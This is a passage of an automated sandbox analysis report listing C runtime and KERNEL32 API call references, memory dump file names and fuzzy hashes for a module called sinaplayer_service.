                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeadInitializeList$??2@mallocmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3540956195-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0FAEA3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0FAECB
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0FAEDA
                                                                                                                                                                                                    • memset.MSVCR120(6D0E9323,00000000,00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0FAF06
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,6D0E9323,00000000,00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0FAF30
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000200,00000100,6D0E9323,00000000,00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0FAF3D
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 747782440-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D094754
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002), ref: 6D0D463E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D464B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4690
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$CurrentDirectory_calloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1498051304-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D12035B,?,?,00000000), ref: 6D1203B4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6D12035B,?,?,00000000), ref: 6D1203BF
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D12035B,?,?,00000000), ref: 6D1203D7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D12035B,?,?,00000000), ref: 6D1203E2
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D128642
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D12864C
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 6D128660
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,00000000,00000000,00000000,000000FF,00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000), ref: 6D128670
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D128699
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    • _wmakepath_s.MSVCR120(00000000,000000FF,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D1286B3
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FeaturePresentProcessProcessorTerminate__crt__get_sys_err_msg_errno_invalid_parameter_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_wmakepath_s
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C52
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C8E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C5D
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C6E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C79
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C99
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126BCB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C07
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126BD6
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126BE7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126BF2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0A0BAA
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,00000000,00000001,?,6D0FC767,0000002F,00000000), ref: 6D0B0E9E
                                                                                                                                                                                                    • calloc.MSVCR120(00000001,00000002,00000000,00000000,00000001,?,6D0FC767,0000002F,00000000), ref: 6D0B0EA9
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,00000000,00000000), ref: 6D0B0EBC
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6D0D6370
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D639B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_invoke_watsoncallocwcscpy_swcslen
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,7622F550), ref: 6D0A3A99
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(6D080000,?,00000104), ref: 6D0A3AB6
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D0A3ACF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0A3AE9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D37F4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000), ref: 6D0D3805
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionFileHandleLastLibraryLoadNameThrow
                                                                                                                                                                                                    APIs
• _malloc_crt.MSVCR120(00000018,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0A9409
• _lock.MSVCR120(0000000A,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0A941B
• __crtInitializeCriticalSectionEx.MSVCR120(00000000,00000FA0,00000000,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0A9438
• __NMSG_WRITE.LIBCMT ref: 6D0D3BC9
• _errno.MSVCR120(6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0D3BDC
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: CriticalInitializeSection__crt_errno_lock_malloc_crt
• String ID:
• API String ID: 3513197803-0
• Opcode ID: f28412bec309e736ee671f3ec396001dfc9b4494dcc850c437d5810a67331f50
• Instruction ID: 880f90921f75fb3733ed33db4dc4cc792e97b14b651c08937d669e25a45c8b42
• Opcode Fuzzy Hash: f28412bec309e736ee671f3ec396001dfc9b4494dcc850c437d5810a67331f50
• Instruction Fuzzy Hash: 8501D876A5C347BAFB511BB4B800B6C3260AB06329F925139E7209F1C1DFB58445A667
APIs
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: CurrentDirectoryErrorLast__doserrno__dosmaperr_errno_invalid_parameter_noinfo
• String ID:
• API String ID: 1064742514-0
• Opcode ID: 51a0e2eefd5d5d0f2da89e56c34cc789986f982d07e30c4537c7bca1e36c8128
• Instruction ID: 21f60be18eeeacbf0adbc7155a64c495ad411bbeb06becfdc945c4ce0b0624e0
• Opcode Fuzzy Hash: 51a0e2eefd5d5d0f2da89e56c34cc789986f982d07e30c4537c7bca1e36c8128
• Instruction Fuzzy Hash: 5501D175A18209ABFB40DFF8D84032E77B4FF0A314F51956AD519CB280FB70C9048B66
APIs
  • Part of subcall function 6D0A58DA: __EH_prolog3.LIBCMT ref: 6D0A58E1
  • Part of subcall function 6D0A6F10: TlsAlloc.KERNEL32 ref: 6D0A6F16
• TlsAlloc.KERNEL32(6D0948CA), ref: 6D0A6F52
• GetLastError.KERNEL32 ref: 6D0D2F79
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2F90
• _CxxThrowException.MSVCR120(6D15CF40,6D15CF40,00000000), ref: 6D0D2F9F
• TlsFree.KERNEL32(6D15CF40,6D15CF40,00000000), ref: 6D0D2FAB
• TlsFree.KERNEL32(?,6D0FA5DB,?,?), ref: 6D0D2FBE
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: AllocFree$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionH_prolog3LastThrow
• String ID:
• API String ID: 46841429-0
• Opcode ID: 00d8d2a9d998e5bd47f94f299f0cac4c74e8de6bea97d1d0c201f20be1e14d09
• Instruction ID: f82becbb11a6085f37e8cb34d7f518c7d811a919d6dafea9a3e709f1e68d3df2
• Opcode Fuzzy Hash: 00d8d2a9d998e5bd47f94f299f0cac4c74e8de6bea97d1d0c201f20be1e14d09
• Instruction Fuzzy Hash: FD017CB1564241DFEB10AFB6E809B3A77B4BB02266F500B29F526C60D1EBB88010CB95
APIs
• __freebuf.LIBCMT ref: 6D094F6E
  • Part of subcall function 6D094E60: free.MSVCR120(?,?,?,6D094F73,?,?), ref: 6D094E76
• _fileno.MSVCR120(?,?,?), ref: 6D094F74
• _close.MSVCR120(00000000,?,?,?), ref: 6D094F7A
• _errno.MSVCR120 ref: 6D0D53EC
• _invalid_parameter_noinfo.MSVCR120 ref: 6D0D53F7
• free.MSVCR120(00000000), ref: 6D0D540E
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: free$__freebuf_close_errno_fileno_invalid_parameter_noinfo
• String ID:
• API String ID: 1586031509-0
• Opcode ID: 420fb923944ec85eb9e92021de29aa89de89cb2ed8c06761b6a58aecfb4c2e10
• Instruction ID: c072027c5a13eef3f7400a781a925967ea910805cabada3c2573f1c948cd388f
• Opcode Fuzzy Hash: 420fb923944ec85eb9e92021de29aa89de89cb2ed8c06761b6a58aecfb4c2e10
• Instruction Fuzzy Hash: 06F0F4369197026EF7211A6A8C0476F3698AF5A37DF125715DA345B0C0D778D0025BA9
APIs
• ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120 ref: 6D0F7D5D
  • Part of subcall function 6D0F81A1: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR120(?,?,00000000,?,?,?,6D0E9222), ref: 6D0F81F1
  • Part of subcall function 6D0F81A1: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0F8228
  • Part of subcall function 6D0F81A1: Concurrency::details::ContextBase::CancelCollectionComplete.LIBCMT ref: 6D0F8246
• __uncaught_exception.MSVCR120 ref: 6D0F7D62
• ?_CleanupToken@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120 ref: 6D0F7D87
• ?_CleanupToken@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120 ref: 6D0F7D93
• ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0F7D9B
• _CxxThrowException.MSVCR120(?,6D15CE94), ref: 6D0F7DB0
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: Concurrency@@$Collection@details@StructuredTask$CleanupSpinToken@_$??0exception@std@@Abort@_Base::CancelCancel@_CollectionCompleteConcurrency::details::ContextExceptionOnce@?$_ThrowWait@$00@details@__uncaught_exception
• String ID:
• API String ID: 4114090006-0
• Opcode ID: d2798bfe3a12fbd269c25449916706f00d688c3990f8b9e5cdc883c019ce47e7
• Instruction ID: 48a670f2981976e61224be5cf3f6004275df95ea03e43ba2705d896a1a360548
• Opcode Fuzzy Hash: d2798bfe3a12fbd269c25449916706f00d688c3990f8b9e5cdc883c019ce47e7
• Instruction Fuzzy Hash: EFF0D130D0870A8AEB249A55D4043BE73F8AF80618FA0869A8D6603550DB70A58AC683
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • _callnewh.MSVCR120(?), ref: 6D0DDA32
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0DDA50
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001), ref: 6D0DDA65
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D0DDA6C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D0DDA73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocErrorExceptionHeapLastThrow_callnewh_errnomallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000180,6D0948CA), ref: 6D0A69E4
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000002,00000180,6D0948CA), ref: 6D0A69F5
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000001,00000002,00000180,6D0948CA), ref: 6D0D345B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0948CA,6D15D088,00000001,00000002,00000180), ref: 6D0D3470
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6D0D347D
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerThreadValue@$CurrentExceptionPriorityThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,6D0AF6A3,?,?,00000104,?), ref: 6D0AF5FD
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,6D0AF6A3,?,?,00000104,?), ref: 6D0AF604
                                                                                                                                                                                                    • _wfullpath.MSVCR120(?,?,?,00000000,?,?,6D0AF6A3,?,?,00000104,?), ref: 6D0AF615
                                                                                                                                                                                                      • Part of subcall function 6D094BF0: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6D094C2A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0AF61F
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$FullNamePath_wfullpath
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F720: GetLastError.KERNEL32(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F722
                                                                                                                                                                                                      • Part of subcall function 6D08F720: __crtFlsGetValue.MSVCR120(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F730
                                                                                                                                                                                                      • Part of subcall function 6D08F720: SetLastError.KERNEL32(00000000,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F741
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(0000001A,00000001), ref: 6D0A91E6
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Value__crt_calloc_crt
                                                                                                                                                                                                    • String ID: $d
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,00000001,00000000), ref: 6D0A8B1D
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 6D0A8B71
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000100,00000020,00000100,?,00000100,5EFC4D8B,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6D0A8B92
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,FE90005A,00000200,00000020,00000100,?,00000100,5EFC4D8B,00000000), ref: 6D0A8BBA
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$__crt$InfoType___crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D31D6
                                                                                                                                                                                                      • Part of subcall function 6D0A6686: InterlockedPopEntrySList.KERNEL32(?,?,?,00000000,?,?,6D0A5627,?,00000000), ref: 6D0A66A1
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D3210
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?), ref: 6D0D3225
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$EntryExceptionInterlockedListThrow
                                                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                    • API String ID: 1048554159-3650809737
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fltout2.LIBCMT ref: 6D09BF13
                                                                                                                                                                                                      • Part of subcall function 6D09B131: $I10_OUTPUT.MSVCR120(?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016,?,0000015D,?), ref: 6D09B170
                                                                                                                                                                                                      • Part of subcall function 6D09B131: strcpy_s.MSVCR120(6D1092B2,?,?,?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016), ref: 6D09B190
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,00000002,?,6D12A55C,000003FF,00000002,00000000,00000000,00000000,?,?,6D1092B2,00000016), ref: 6D0E0FC3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000000,00000002,?,6D12A55C,000003FF,00000002,00000000,00000000,00000000,?,?,6D1092B2,00000016), ref: 6D0E0FCA
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,00000002,?,6D12A55C,000003FF,00000002,00000000,00000000,00000000,?,?,6D1092B2,00000016), ref: 6D0E0FD6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$I10___fltout2_invalid_parameter_noinfostrcpy_s
                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                    • API String ID: 2633025121-2547889144
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(005B79DE,6D0B2CB8,?,6D161218,6D0B2DD4), ref: 6D0B2C85
                                                                                                                                                                                                    • _wmatch.LIBCMT ref: 6D0D3E9F
